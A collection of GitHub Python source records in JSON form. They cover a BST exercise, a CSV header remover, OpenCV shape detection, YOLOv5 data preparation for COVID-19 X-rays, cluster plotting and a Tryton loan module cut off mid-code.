self.thread_setup()\n\n def walk_roots(self, collect_stack_root,\n collect_static_in_prebuilt_nongc,\n collect_static_in_prebuilt_gc):\n gcdata = self.gcdata\n gc = self.gc\n if collect_static_in_prebuilt_nongc:\n addr = gcdata.static_root_start\n end = gcdata.static_root_nongcend\n while addr != end:\n result = addr.address[0]\n if gc.points_to_valid_gc_object(result):\n collect_static_in_prebuilt_nongc(gc, result)\n addr += sizeofaddr\n if collect_static_in_prebuilt_gc:\n addr = gcdata.static_root_nongcend\n end = gcdata.static_root_end\n while addr != end:\n result = addr.address[0]\n if gc.points_to_valid_gc_object(result):\n collect_static_in_prebuilt_gc(gc, result)\n addr += sizeofaddr\n if collect_stack_root:\n self.walk_stack_roots(collect_stack_root) # abstract\n\n def need_stacklet_support(self):\n raise Exception(\"%s does not support stacklets\" % (\n self.__class__.__name__,))\n\n def need_thread_support(self, gctransformer, getfn):\n raise Exception(\"%s does not support threads\" % (\n self.__class__.__name__,))\n","repo_name":"diffoperator/Sypy","sub_path":"rpython/memory/gctransform/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":62453,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"66"} +{"seq_id":"36307593423","text":"# Given a binary search tree, write an algorithm to find the \"next\" (in-order) node of a given node in a BST.\n# Assume all nodes have links to their parents.\n\n# Idea: One way is to just do the in-order traversal, but this costs O(n) time.\n# Another way is to find the node, which can be done quickly. \n# Cases:\n# If the node has no right child, then traverse up the parents until we hit a bigger (or identical) node. If we hit the root and no match,\n# then return None.\n# If the node has a right child, go to it, then go all the way to the left-most child.\n\nfrom binarysearchtree import BinarySearchTree\nimport random\n\ndef getNextNode(node):\n curr = node\n if node.right is None:\n while curr.parent:\n curr = curr.parent\n if curr.value >= node.value:\n return curr\n else:\n curr = node.right\n while curr.left:\n curr = curr.left\n return curr\n\n return None\n\n# Get a random node from the tree. Not great efficiency (O(n)) but it gets the job done.\ndef getRandomNode(tree):\n treeSize = tree.getSize()\n targetIndex = random.randint(0, treeSize - 1)\n index = 0\n \n queue = [tree]\n\n while True:\n curr = queue.pop(0)\n if index == targetIndex:\n return curr\n \n index += 1\n\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n\n# Testing\n\ntree = BinarySearchTree()\nelements = []\nfor i in range(20):\n value = random.randint(0, 50)\n tree.insert(value)\n elements.append(value)\n\nprint(\"Your tree:\", end = \" \")\ntree.traverseBFS()\n\nnode = getRandomNode(tree)\nnextNode = getNextNode(node)\n\nif nextNode:\n print(\"Your node: %d\\nNext node: %d\" % (node.value, nextNode.value))\nelse:\n print(\"Your node: %d\\nNo next node\" % node.value)\n\nelements = sorted(elements)\n\nnodeIndex = elements.index(node.value)\n\nif nextNode:\n assert elements[nodeIndex + 1] in [nextNode.value, node.value]\nelse:\n assert node.value == max(elements)","repo_name":"PBearson/cracking-the-coding-interview","sub_path":"9-interview-questions/4-trees-and-graphs/4-6.py","file_name":"4-6.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37581488725","text":"''' \n\nSay you have the boring job of removing the first line from several hundred\nCSV files. Maybe you’ll be feeding them into an automated process that\nrequires just the data and not the headers at the top of the columns. You\ncould open each file in Excel, delete the first row, and resave the file—but\nthat would take hours. Let’s write a program to do it instead.\nThe program will need to open every file with the .csv extension in the\ncurrent working directory, read in the contents of the CSV file, and rewrite\nthe contents without the first row to a file of the same name. This will\nreplace the old contents of the CSV file with the new, headless contents.\n\nAt a high level, the program must do the following:\n•\t Find all the CSV files in the current working directory.\n•\t Read in the full contents of each file.\n•\t Write out the contents, skipping the first line, to a new CSV file.\nAt the code level, this means the program will need to do the following:\n•\t Loop over a list of files from os.listdir(), skipping the non-CSV files.\n•\t Create a CSV Reader object and read in the contents of the file, using\nthe line_num attribute to figure out which line to skip.\n•\t Create a CSV Writer object and write out the read-in data to the new file.\n\n'''\n#! python3\n# removeCsvHeader.py - Removes the header from all CSV files in the current\n# working directory.\nimport csv, os\n\ndef project_one():\n os.makedirs('projectOne', exist_ok=True)\n\n # Loop through every file in the current working directory.\n for csvFilename in os.listdir('.'):\n if not csvFilename.endswith('.csv'):\n continue # skip non-csv files\n print('Removing header from ' + csvFilename + '...')\n # Read the CSV file in (skipping first row).\n csvRows = []\n csvFileObj = open(csvFilename)\n readerObj = csv.reader(csvFileObj)\n for row in readerObj:\n if readerObj.line_num == 1:\n continue # skip first row\n csvRows.append(row)\n csvFileObj.close()\n\n # Write out the CSV file.\n csvFileObj = open(os.path.join('projectOne', csvFilename), 'w',\n newline='')\n csvWriter = csv.writer(csvFileObj)\n for row in csvRows:\n csvWriter.writerow(row)\n csvFileObj.close()\n\n\nif __name__ == \"__main__\":\n project_one()","repo_name":"ftarantuviez/Automate-Boring-Stuff-with-Python","sub_path":"chapter14/project_1.py","file_name":"project_1.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33138673817","text":"import cv2\r\n\r\n#untuk countour\r\ncontours = {}\r\n#array deteksi polygon\r\napprox = []\r\n#ukuran print text\r\nscale = 1\r\n#untuk open camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n#ngitung polygon\r\nwhile(cap.isOpened()):\r\n #untuk capture camera tiap frame\r\n ret, frame = cap.read()\r\n if ret==True:\r\n #cv ke grayscale\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n #deteksi Canny\r\n canny = cv2.Canny(frame,80,240,3)\r\n\r\n #gae contours\r\n canny2, contours, hierarchy = cv2.findContours(canny,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n for i in range(0,len(contours)):\r\n\r\n #countour perimeter\r\n approx = cv2.approxPolyDP(contours[i],cv2.arcLength(contours[i],True)*0.02,True)\r\n\r\n #tambahan untuk objek yang tidak jelas\r\n if(abs(cv2.contourArea(contours[i]))<100 or not(cv2.isContourConvex(approx))):\r\n continue\r\n\r\n elif(len(approx)==4):\r\n\r\n #Hitung polygon\r\n vtc = len(approx)\r\n\r\n #Jika Terdeteksi 4 = persegi\r\n x,y,w,h = cv2.boundingRect(contours[i])\r\n if(vtc==4):\r\n #print peregi dalam frame\r\n cv2.putText(frame, 'PERSEGI', (x, y), cv2.FONT_HERSHEY_SIMPLEX, scale, (0, 255, 255), 2, cv2.LINE_AA)\r\n\r\n\r\n\r\n #munculkan hasil\r\n cv2.drawContours(frame, contours, -1, (0, 255, 0), 3)\r\n cv2.imshow('frame',frame)\r\n cv2.imshow('canny',canny)\r\n if cv2.waitKey(1) == 1048689:\r\n break\r\n\r\n#finish\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"tondy666/OpenCV-Shape-Detection","sub_path":"realtime_shape_detection.py","file_name":"realtime_shape_detection.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31677159235","text":"\n# see how to print sequence 1) find init 2) then find inherent class init 3) then find class variable of B and then A\n# ones we copy class A Instant to B then he see that you overide so avoide this problem we used super() see below\nclass A:\n ram = \"I am in class A\"\n def __init__(self):\n self.one = \"i am in instant A\"\n self.two = \" you are in instant A\"\n self.three = \"special\"\n\n# override class A\nclass B(A):\n ram = \"I am in class B\"\n def __init__(self):\n super().__init__() # ab run honga 'special'\n self.one = \"i am in instant B\" # when we commitout and this line then he print class A instant\n self.two = \" you are in instant B\"\n\n# object\na = A()\nb = B()\n\nprint(b.three) # see here print class B attribute ,because we override, see same name of variable\nprint(b.one)\n","repo_name":"mayurgorane2311/pythontutorial","sub_path":"41.super() and overriding.py","file_name":"41.super() and overriding.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11117838929","text":"# Necessary/extra dependencies. \nimport os\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom tqdm import tqdm\nfrom shutil import copyfile\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nimport shutil\n\n# Get the raw bounding box by parsing the row value of the label column.\n# Ref: https://www.kaggle.com/yujiariyasu/plot-3positive-classes\ndef get_bbox(row):\n bboxes = []\n bbox = []\n for i, l in enumerate(row.label.split(' ')):\n if (i % 6 == 0) | (i % 6 == 1):\n continue\n bbox.append(float(l))\n if i % 6 == 5:\n bboxes.append(bbox)\n bbox = [] \n \n return bboxes\n\n# Scale the bounding boxes according to the size of the resized image. \ndef scale_bbox(row, bboxes):\n # Get scaling factor\n scale_x = IMG_SIZE/row.dim1\n scale_y = IMG_SIZE/row.dim0\n \n scaled_bboxes = []\n for bbox in bboxes:\n x = int(np.round(bbox[0]*scale_x, 4))\n y = int(np.round(bbox[1]*scale_y, 4))\n x1 = int(np.round(bbox[2]*(scale_x), 4))\n y1= int(np.round(bbox[3]*scale_y, 4))\n\n scaled_bboxes.append([x, y, x1, y1]) # xmin, ymin, xmax, ymax\n \n return scaled_bboxes\n\n# Convert the bounding boxes in YOLO format.\ndef get_yolo_format_bbox(img_w, img_h, bboxes):\n yolo_boxes = []\n for bbox in bboxes:\n w = bbox[2] - bbox[0] # xmax - xmin\n h = bbox[3] - bbox[1] # ymax - ymin\n xc = bbox[0] + int(np.round(w/2)) # xmin + width/2\n yc = bbox[1] + int(np.round(h/2)) # ymin + height/2\n \n yolo_boxes.append([xc/img_w, yc/img_h, w/img_w, h/img_h]) # x_center y_center width height\n \n return yolo_boxes\n\n\ndef write_bbox_files(tmp_df, fold_num, split):\n path = f'./input/dataset_folds_{fold}/labels/{split}'\n for i in tqdm(range(len(tmp_df))):\n row = tmp_df.loc[i]\n # Get image id\n img_id = row.id\n # Get image-level label\n label = row.image_level\n\n file_name = f'{path}/{img_id}.txt'\n\n if label==1:\n # Get bboxes\n bboxes = get_bbox(row)\n # Scale bounding boxes\n scale_bboxes = scale_bbox(row, bboxes)\n # Format for YOLOv5\n yolo_bboxes = get_yolo_format_bbox(IMG_SIZE, IMG_SIZE, scale_bboxes)\n\n with open(file_name, 'w') as f:\n for bbox in yolo_bboxes:\n bbox = [1]+bbox\n bbox = [str(i) for i in bbox]\n bbox = ' '.join(bbox)\n f.write(bbox)\n f.write('\\n')\n\n\ndef preprocess_image_level_df(image_level_path='./input/train_image_level.csv'):\n df = pd.read_csv(image_level_path)\n\n # Modify values in the id column\n df['id'] = df.apply(lambda row: row.id.split('_')[0], axis=1)\n # Add absolute path\n # df['path'] = df.apply(lambda row: f'{TRAIN_PATH}/{row.id}.png', axis=1)\n # Get image level labels\n # df['image_level'] = df.apply(lambda row: row.label.split(' ')[0], axis=1)\n\n def _image_level(row):\n label = row.label.split(' ')[0]\n if label == 'opacity': return 1\n else: return 0\n\n df['image_level'] = df.apply(lambda row: _image_level(row), axis=1)\n print('Done Preprocess Image Level Data')\n return df\n\n\ndef preprocess_meta_df():\n meta_df = pd.read_csv('./input/meta.csv') #siim-covid19-resized-to-256px-png\n train_meta_df = meta_df.loc[meta_df.split == 'train']\n train_meta_df = train_meta_df.drop('split', axis=1)\n train_meta_df.columns = ['id', 'dim0', 'dim1']\n print('Done Preprocess Meta Data')\n return train_meta_df\n\n\ndef preprocess_study_level(image_level_df):\n label_df = pd.read_csv('./input/train_study_level.csv')\n\n # Modify values in the id column\n label_df['id'] = label_df.apply(lambda row: row.id.split('_')[0], axis=1)\n # Rename the column id with StudyInstanceUID\n label_df.columns = ['StudyInstanceUID', 'Negative for Pneumonia', 'Typical Appearance', 'Indeterminate Appearance', 'Atypical Appearance']\n\n # Label encode study-level labels\n labels = label_df[['Negative for Pneumonia','Typical Appearance','Indeterminate Appearance','Atypical Appearance']].values\n labels = np.argmax(labels, axis=1)\n label_df['study_level'] = labels\n\n # ORIGINAL DIMENSION\n\n # Load meta.csv file\n train_meta_df = preprocess_meta_df()\n # Merge image-level and study-level\n image_study_total = image_level_df.merge(label_df, on='StudyInstanceUID',how=\"left\")\n # Merge with meta_df\n image_study_total = image_study_total.merge(train_meta_df, on='id',how=\"left\")\n\n # Write as csv file\n image_study_total.to_csv('./input/_image_study_total.csv', index=False)\n print(f'Image Study Total csv file saved to: ./input/_image_study_total.csv')\n return image_study_total\n\n\ndef make_image_level_fold(img_path='./input/siim-covid19-resized-to-256px-png/train/', n_fold=5, seed=42):\n # /Users/rick/Dropbox/python_projects/data_science/Kaggle/siim_covid19/input/siimcovid19-512-img-png-600-study-png/image\n df = pd.read_csv('./input/_image_study_total.csv')\n df['path'] = df.apply(lambda row: f'{img_path}/{row.id}_image.png', axis=1)\n \n # Group by Study Ids and remove images that are \"assumed\" to be mislabeled\n for grp_df in df.groupby('StudyInstanceUID'):\n grp_id, grp_df = grp_df[0], grp_df[1]\n if len(grp_df) == 1:\n pass\n else:\n for i in range(len(grp_df)):\n row = grp_df.loc[grp_df.index.values[i]]\n if row.study_level > 0 and row.boxes is np.nan:\n df = df.drop(grp_df.index.values[i])\n \n print('total number of images: ', len(df))\n \n # Create train and validation split.\n df = df.drop('boxes', axis=1).reset_index()\n Fold = StratifiedKFold(n_splits=n_fold, shuffle=True, random_state=seed)\n for n, (train_index, val_index) in enumerate(Fold.split(df, df['image_level'])):\n df.loc[val_index, 'fold'] = int(n)\n df['fold'] = df['fold'].astype(int)\n\n df.to_csv('./input/train_fold.csv', index=False)\n print(f'Image Level Fold csv file saved to: ./input/train_fold.csv')\n return df\n\n\ndef create_yaml_file(n_fold=5):\n for fold in range(n_fold):\n data_yaml = dict(\n train = f'./input/dataset_folds_{fold}/images/train',\n val = f'./input/dataset_folds_{fold}/images/valid',\n nc = 2,\n names = ['none', 'opacity']\n )\n\n # Note that I am creating the file in the yolov5/data/ directory.\n with open(f'./src/models/yolov5/data/data_fold_{fold}.yaml', 'w') as outfile:\n yaml.dump(data_yaml, outfile, default_flow_style=True)\n print(f'config yaml file saved to: ./src/models/yolov5/data/data_fold_{fold}.yaml')\n\n\ndef prepare_images(df, n_fold=5):\n # Remove existing dirs\n for fold in range(n_fold):\n print(f'Preparing Images for Fold {fold}')\n # Prepare train and valid df\n train_df = df.loc[df.fold != fold].reset_index(drop=True)\n valid_df = df.loc[df.fold == fold].reset_index(drop=True)\n \n try:\n shutil.rmtree(f'./input/dataset_folds_{fold}/images')\n shutil.rmtree(f'./input/dataset_folds_{fold}/labels')\n print(f'Deleted: ./input/dataset_folds_{fold}/images')\n print(f'Deleted: ./input/dataset_folds_{fold}/labels')\n except:\n print('No dirs')\n\n # Make new dirs\n os.makedirs(f'./input/dataset_folds_{fold}/images/train', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/images/valid', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/labels/train', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/labels/valid', exist_ok=True)\n print(f'Made Directory: ./input/dataset_folds_{fold}/images/train')\n print(f'Made Directory: ./input/dataset_folds_{fold}/images/valid')\n print(f'Made Directory: ./input/dataset_folds_{fold}/labels/train')\n print(f'Made Directory: ./input/dataset_folds_{fold}/labels/valid')\n\n # Move the images to relevant split folder.\n for i in tqdm(range(len(train_df))):\n row = train_df.loc[i]\n copyfile(row.path, f'./input/dataset_folds_{fold}/images/train/{row.id}.png')\n \n for i in tqdm(range(len(valid_df))):\n row = valid_df.loc[i]\n copyfile(row.path, f'./input/dataset_folds_{fold}/images/valid/{row.id}.png')\n\n print('Done Prepare Images')\n\n\nif __name__ == '__main__':\n # TRAIN_PATH = 'input/siim-covid19-resized-to-256px-jpg/train/'\n TRAIN_PATH = 'input/siimcovid19-512-img-png-600-study-png/image' #'./input/train/'\n\n n_fold = 5\n IMG_SIZE = 512 #256\n seed=42\n\n if n_fold == 5:\n image_level_df = preprocess_image_level_df()\n image_study_total = preprocess_study_level(image_level_df)\n image_level_fold_df = make_image_level_fold(img_path=TRAIN_PATH, n_fold=n_fold, seed=seed)\n prepare_images(image_level_fold_df, n_fold=n_fold)\n create_yaml_file(n_fold=n_fold)\n\n # Prepare the txt files for bounding box\n for fold in range(n_fold):\n # Prepare train and valid df\n train_df = image_level_fold_df.loc[image_level_fold_df.fold != fold].reset_index(drop=True)\n valid_df = image_level_fold_df.loc[image_level_fold_df.fold == fold].reset_index(drop=True)\n \n # prepare label for train\n write_bbox_files(train_df, fold, 'train')\n # prepare label for valid\n write_bbox_files(valid_df, fold, 'valid')\n\n elif n_fold == 1:\n if not os.path.exists('./input/train_v1.csv') and n_fold ==1:\n # Load image level csv file\n df = preprocess_image_level_df()\n # Load meta.csv file\n # Original dimensions are required to scale the bounding box coordinates appropriately.\n train_meta_df = preprocess_meta_df()\n\n image_level_df = df.merge(train_meta_df, on='id',how=\"left\")\n image_level_df.to_csv('./input/train_v1.csv', index=False)\n\n df = pd.read_csv('./input/train_v1.csv')\n # Create train and validation split.\n train_df, valid_df = train_test_split(df, test_size=0.2, random_state=42, stratify=df.image_level.values)\n\n train_df.loc[:, 'split'] = 'train'\n valid_df.loc[:, 'split'] = 'valid'\n\n train_df.loc[:, 'fold'] = 1\n valid_df.loc[:, 'fold'] = 0\n\n df = pd.concat([train_df, valid_df]).reset_index(drop=True)\n df.to_csv('./input/train_image_v1_fold.csv', index=False)\n\n\n print(f'Size of dataset: {len(df)}, training images: {len(train_df)}. validation images: {len(valid_df)}')\n\n\n os.makedirs('./input/tmp/covid/images/train', exist_ok=True)\n os.makedirs('./input/tmp/covid/images/valid', exist_ok=True)\n\n os.makedirs('./input/tmp/covid/labels/train', exist_ok=True)\n os.makedirs('./input/tmp/covid/labels/valid', exist_ok=True)\n\n\n # Move the images to relevant split folder.\n for i in tqdm(range(len(df))):\n row = df.loc[i]\n if row.split == 'train':\n copyfile(row.path, f'./input/tmp/covid/images/train/{row.id}.jpg')\n else:\n copyfile(row.path, f'./input/tmp/covid/images/valid/{row.id}.jpg')\n\n\n # ## 🍜 Create `.YAML` file\n # \n # The `data.yaml`, is the dataset configuration file that defines \n # \n # 1. an \"optional\" download command/URL for auto-downloading, \n # 2. a path to a directory of training images (or path to a *.txt file with a list of training images), \n # 3. a path to a directory of validation images (or path to a *.txt file with a list of validation images), \n # 4. the number of classes, \n # 5. a list of class names.\n # \n # > 📍 Important: In this competition, each image can either belong to `opacity` or `none` image-level labels. That's why I have used the number of classes, `nc` to be 2. YOLOv5 automatically handles the images without any bounding box coordinates. \n # \n # > 📍 Note: The `data.yaml` is created in the `yolov5/data` directory as required. \n # Create .yaml file \n data_yaml = dict(\n train = './input/tmp/covid/images/train',\n val = './input/tmp/covid/images/valid',\n # nc = 2,\n # names = ['none', 'opacity']\n nc = 4,\n names = ['Negative for Pneumonia', 'Typical Appearance',\n 'Indeterminate Appearance', 'Atypical Appearance']\n )\n\n # Note that I am creating the file in the yolov5/data/ directory.\n with open('../src/yolov5/data/data_v2.yaml', 'w') as outfile:\n yaml.dump(data_yaml, outfile, default_flow_style=True)\n \n\n # ## 🍮 Prepare Bounding Box Coordinated for YOLOv5\n # \n # For every image with **bounding box(es)** a `.txt` file with the same name as the image will be created in the format shown below:\n # \n # * One row per object.
        \n # * Each row is class `x_center y_center width height format`.
        \n # * Box coordinates must be in normalized xywh format (from 0 - 1). We can normalize by the boxes in pixels by dividing `x_center` and `width` by image width, and `y_center` and `height` by image height.
        \n # * Class numbers are zero-indexed (start from 0).
        \n # \n # > 📍 Note: We don't have to remove the images without bounding boxes from the training or validation sets. \n\n # Prepare the txt files for bounding box\n for i in tqdm(range(len(df))):\n row = df.loc[i]\n # Get image id\n img_id = row.id\n # Get split\n split = row.split\n # Get image-level label\n label = row.image_level\n \n if row.split=='train':\n file_name = f'./input/tmp/covid/labels/train/{row.id}.txt'\n else:\n file_name = f'./input/tmp/covid/labels/valid/{row.id}.txt'\n \n \n if label=='opacity':\n # Get bboxes\n bboxes = get_bbox(row)\n # Scale bounding boxes\n scale_bboxes = scale_bbox(row, bboxes)\n # Format for YOLOv5\n yolo_bboxes = get_yolo_format_bbox(IMG_SIZE, IMG_SIZE, scale_bboxes)\n \n with open(file_name, 'w') as f:\n for bbox in yolo_bboxes:\n bbox = [1]+bbox\n bbox = [str(i) for i in bbox]\n bbox = ' '.join(bbox)\n f.write(bbox)\n f.write('\\n')","repo_name":"R1ck29/kaggle-siim-fisabio-rsna-covid-19-detection","sub_path":"src/preprocess/detection/preprocess_yolov5.py","file_name":"preprocess_yolov5.py","file_ext":"py","file_size_in_byte":14834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74119810451","text":"from collections import defaultdict\nfrom utilities import constants\nimport plotly.graph_objs as go\nimport plotly.offline as ply\nfrom utilities import utils\nfrom plotly import tools\nimport numpy as np\nimport json\nimport os\n\n\ndef plot_cluster_features(config, clustering, names=None, av=False):\n \"\"\"\n Plot the histograms of the features of the clusters.\n For each cluster, order the features and plot the histograms, then move down.\n\n :param config: application configuration dictionary\n :param clustering: dictionary mapping uuids to cluster ids\n :param names: family labels\n :param av: flag, if set the method is plotting AV labeling\n :return:\n \"\"\"\n\n dir_store = config['dir_store']\n words = json.load(open(os.path.join(constants.dir_d, constants.json_words), 'r'))\n word_list = sorted(list(words.keys()))\n\n print('Plotting clustering features')\n\n reverse_clustering = defaultdict(list)\n for uuid, cluster in clustering.items():\n reverse_clustering[cluster].append(uuid)\n\n i = 1\n n_clust = len(reverse_clustering)\n base = np.arange(len(word_list))\n\n axis_dict = dict(\n autorange=True,\n showgrid=False,\n zeroline=False,\n showline=False,\n autotick=True,\n ticks='',\n showticklabels=False\n )\n fig = tools.make_subplots(rows=n_clust, cols=1)\n\n for cluster in sorted(reverse_clustering):\n cluster_features = np.zeros(len(word_list))\n\n uuids = reverse_clustering[cluster]\n for uuid in uuids:\n tfidfs = json.load(open(os.path.join(dir_store, uuid), 'r'))\n\n for j in range(len(word_list)):\n cluster_features[j] += tfidfs.get(word_list[j], 0)\n\n if names:\n name = names[i - 1]\n else:\n name = str(i)\n\n trace = go.Scatter(x=base, y=cluster_features, name=name, text=word_list)\n fig.append_trace(trace, i, 1)\n fig['layout']['xaxis{}'.format(i)].update(axis_dict)\n fig['layout']['yaxis{}'.format(i)].update(axis_dict)\n\n i += 1\n\n plot_name = os.path.join(constants.dir_d, constants.dir_vis, 'features_{}'.format(len(clustering)))\n plot_name = plot_name + '_AV' if av else plot_name\n ply.plot(fig, filename=plot_name)\n\n\ndef plot_av_features(uuids, config):\n \"\"\"\n Uses the cluster feature plotting method to show the features of the clusters provided by AV labeling.\n\n :param uuids: list of uuids\n :param config: configuration dictionary\n :return:\n \"\"\"\n\n labels = utils.get_base_labels_uuids(uuids)\n pseudo_clustering = dict(zip(uuids, labels))\n families = utils.get_index_labels()\n families = sorted(set([families[label] for label in labels]))\n\n plot_cluster_features(config, pseudo_clustering, families)\n","repo_name":"ClonedOne/malwords","sub_path":"visualization/vis_cluster.py","file_name":"vis_cluster.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24496871283","text":"import datetime\nfrom trytond.model import Workflow\nfrom trytond.model import (\n ModelView, ModelSQL, fields)\nfrom trytond.pool import Pool\nfrom trytond.pyson import Eval\nfrom trytond.transaction import Transaction\n\n__all__ = ['ComputerLoan', 'LoanCancelreason', 'loanLine']\n\n\nclass ComputerLoan(Workflow, ModelSQL, ModelView):\n 'Computer Loan'\n __name__ = 'computer.loan'\n\n salary_code = fields.Char('Salary Code',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n employee = fields.Many2One('company.employee', 'Name of Applicant',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n designation = fields.Many2One(\"employee.designation\",\n \"Applicant's Designation\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n department = fields.Many2One('company.department', 'Department')\n pay_in_band = fields.Char('Pay in the Pay Band')\n price = fields.Float('Price of Personal Computer')\n amount_required = fields.Float(\"Amount Required\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'], required=True)\n date_of_retirement = fields.Date('Date of Retirement')\n dob = fields.Date(\"Date of Birth\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n installment_no = fields.Integer(\"Number of installment\")\n purpose = fields.Selection([\n ('', 'None'),\n ('yes', 'Yes'),\n ('no', 'No'),\n ], string='Purpose',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'], required=True)\n drawal_date = fields.Date('Date of drawal of advance',\n states={\n 'invisible': ~Eval('purpose').in_(['yes']),\n 'required': Eval('purpose').in_(['yes']),\n }, depends=['purpose'])\n interest = fields.Float('Interest',\n states={\n 'invisible': ~Eval('purpose').in_(['yes']),\n 'required': Eval('purpose').in_(['yes']),\n }, depends=['purpose'])\n basic_pay = fields.Float(\"Basic Pay\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n cancel_reason = fields.Many2One('loan.cancel.reason', 'Cancel Reason',\n states={\n 'invisible': ~Eval(\n 'state').in_(['forwarded_to_ao', 'cancel']),\n 'readonly': ~Eval('state').in_(['forwarded_to_ao']),\n }, depends=['state'],)\n payout = fields.Float('Payout',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n pending = fields.Float('Pending',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n reschedule = fields.Float('Reschedule',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n state = fields.Selection(\n [\n ('draft', 'Draft'),\n ('forwarded_to_jo', 'Forwarded to JO'),\n ('forwarded_to_ao', 'Forwarded to AO'),\n ('approve', 'Approved'),\n ('cancel', 'Cancel')\n ], 'Status', readonly=True\n )\n\n @classmethod\n def __setup__(cls):\n super().__setup__()\n cls._transitions |= set((\n ('draft', 'forwarded_to_jo'),\n ('forwarded_to_jo', 'forwarded_to_ao'),\n ('forwarded_to_ao', 'approve'),\n ('forwarded_to_ao', 'cancel'),\n ))\n cls._buttons.update({\n 'submitted_to_ao': {\n 'invisible': ~Eval('state').in_(\n ['draft']),\n 'depends': ['state'],\n },\n 'forward_to_jo': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_jo']),\n 'depends': ['state'],\n },\n 'forward_to_ao': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_ao']),\n 'depends': ['state'],\n },\n 'cancel': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_ao']),\n 'depends': ['state'],\n },\n })\n\n @staticmethod\n def default_state():\n return 'draft'\n\n @classmethod\n @ModelView.button\n @Workflow.transition('forwarded_to_jo')\n def submitted_to_ao(cls, records):\n cls.loan_installment(records)\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('forwarded_to_ao')\n def forward_to_jo(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('approve')\n def forward_to_ao(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('cancel')\n def cancel(cls, records):\n for record in records:\n if not record.cancel_reason:\n cls.raise_user_error('Please fill the Cancel reason')\n pass\n\n @staticmethod\n def default_employee():\n pool = Pool()\n User = pool.get('res.user')\n user = User(Transaction().user)\n employee = user.employee\n return employee.id if employee else None\n\n @fields.depends('employee')\n def on_change_employee(self, name=None):\n self.salary_code = self.employee.salary_code\n self.designation = self.employee.designation\n self.department = self.employee.department\n self.pay_in_band = self.employee.pay_in_band\n pool = Pool()\n hrcontract = pool.get('hr.contract')\n contracts = hrcontract.search([\n ('employee', '=', self.employee),\n ('active', '<=', True)\n ])\n for contract in contracts:\n self.basic_pay = contract.basic\n\n @classmethod\n def write(cls, *args):\n actions = iter(args)\n for mechanisms, values in zip(actions, actions):\n if 'installment_no' in values.keys():\n cls.change_loan_installment(mechanisms, values)\n super(ComputerLoan, cls).write(*args)\n\n @classmethod\n def change_loan_installment(cls, records, values):\n cursor = Transaction().connection.cursor()\n LoanLine = Pool().get('loan.line')\n for loan in records:\n cursor.execute('SELECT sum(amount) FROM loan_line WHERE loan=%s \\\n AND status = %s', (loan.id, 'done'))\n total_amount = cursor.fetchone()\n if total_amount[0]:\n reschedule = loan.amount_required - total_amount[0]\n cls.write(records, {'payout': total_amount[0],\n 'reschedule': reschedule})\n amount = (reschedule/values['installment_no'])\n else:\n amount = (loan.amount_required/values['installment_no'])\n cursor.execute('delete FROM loan_line WHERE loan=%s \\\n AND status != %s', (loan.id, 'done'))\n count = 0\n for line in range(1, int(values['installment_no'])+1):\n mydate = datetime.datetime.now().month\n month = mydate - 1\n if month+line > 12:\n count +=1\n if count > 12:\n count = 1\n months = datetime.date(1900, count, 1).strftime('%B')\n else:\n months = datetime.date(1900, month+line, 1).strftime('%B')\n vals = {\n 'month': months,\n 'amount': amount,\n 'status': 'pending',\n 'loan': loan.id\n }\n line = LoanLine.create([vals])\n\n @classmethod\n def loan_installment(cls, records):\n count = 0\n LoanLine = Pool().get('loan.line')\n for loan in records:\n amount = (loan.amount_required/loan.installment_no)\n for line in range(1, int(loan.installment_no)+1):\n mydate = datetime.datetime.now().month\n month = mydate - 1\n if month + line > 12:\n count += 1\n if count > 12:\n count = 1\n months = datetime.date(1900, count, 1).strftime('%B')\n else:\n months = datetime.date(1900, month+line, 1).strftime('%B')\n vals = {\n 'month': months,\n 'amount': amount,\n 'status': 'pending',\n 